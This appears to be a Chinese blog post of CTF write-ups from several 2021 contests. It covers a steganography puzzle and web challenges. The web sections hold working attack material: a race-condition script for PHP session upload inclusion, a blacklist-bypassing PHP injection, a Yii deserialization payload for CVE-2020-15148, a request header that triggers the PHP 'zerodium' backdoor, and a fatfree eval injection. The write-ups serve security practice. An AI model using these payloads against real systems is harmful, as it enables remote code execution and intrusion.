近期一些CTF题解

近期一些CTF题解

第一届广东大学生网络安全攻防大赛

Misc

小猪的家

binwalk -e pig.png有压缩包 pigpen.zip

png改成gif

stegsolve改颜色

发现二维码碎片

3507564237

拼接二维码

3715057020

JUZFU2C2NJTTETKUKF3Q====

base32 decode:

M2ZhZjg2MTQw

Base64 decode:

3faf86140

是压缩包密码

解压得到猪圈密码

647290714

flag{this_isa_pigpen_fake_flag}

CISCN2021

Web

easy_source

原题

https://r0yanx.com/2020/10/28/fslh-writeup/

710451491

middle_source

https://blog.csdn.net/mochu7777777/article/details/116499336

PHP_SESSION_UPLOAD_PROGRESS + 条件竞争

扫到.listing

有个you_can_seeeeeeee_me.php

是phpinfo

disable了很多functions

用scandir在etc下手动查找

2082008876

很可疑

查找后套了很多层目录

每个队的目录不一样

真的是。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#coding=utf-8

import io
import requests
import threading
sessid = 'AAAA'
#file_get_contents
data = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php $a = scandir("/etc/");var_dump($a);?>',"field":"abcababaa","cf":"../../../../../../../var/lib/php/sessions/dfhjecdbcc/sess_"+sessid}
def write(session):
while True:
resp = session.post('http://121.36.24.90:25186/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php phpinfo();?>'}, files={'file': ('AAAA.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post('http://121.36.24.90:25186/', data=data, files={'file': ('AAAA.txt',f)}, cookies={'PHPSESSID': sessid} )
if(len(resp.text) != 2037):
print(resp.text)
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in range(1,30):
threading.Thread(target=read,args=(session,)).start()
event.set()

红帽杯2021

Web

find_it

http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/robots.txt

When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php

http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/.1ndexx.php.swp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}

#logo {
margin-bottom: 40px;
}
</style>
</head>
<body>
<img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

payload :

index?code=<?php show_source($_GET['a']);?>

hack.php?a=flag.php

读到

1
2
3
4
5
6
7
8
9
<?php 

#ini_set('display_errors',true);
#error_reporting(E_ALL ^ E_NOTICE);

flag=MZWGCZ33GU2TSMJZMNRTMLLDGQYDGLJUGI3TELLBGFSTCLLEGVQTEMRYMU3DQYRWMZ6Q====;

echo "What is important for a new bird of php??"
?>

http://ctf.ssleye.com/base64.html

base32解

framework

源码泄露 www.zip

http://eci-2zecqobeh1kk8w7rdiks.cloudeci1.ichunqiu.com:80

https://forum.butian.net/share/56

原题

CVE-2020-15148

反序列化

/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjIwOiJldmFsKCRfR0VUWyJjb2RlIl0pOyI7fWk6MTtzOjE4OiJldmFsdWF0ZURlcGVuZGVuY3kiO319fQ==&code=phpinfo();

然后蚁剑 disable一把梭

虎符CTF

Web

签到

php源码后门

是agent后面还有一个t

User-Agentt:zerodiumsystem(“cat /flag”);

3362474475

unsetme

fatfree框架

审计 base.php 530行有eval

571545184
构造payload

?a=asd&a=asd%0a,$abc);system(“ls”

3458934712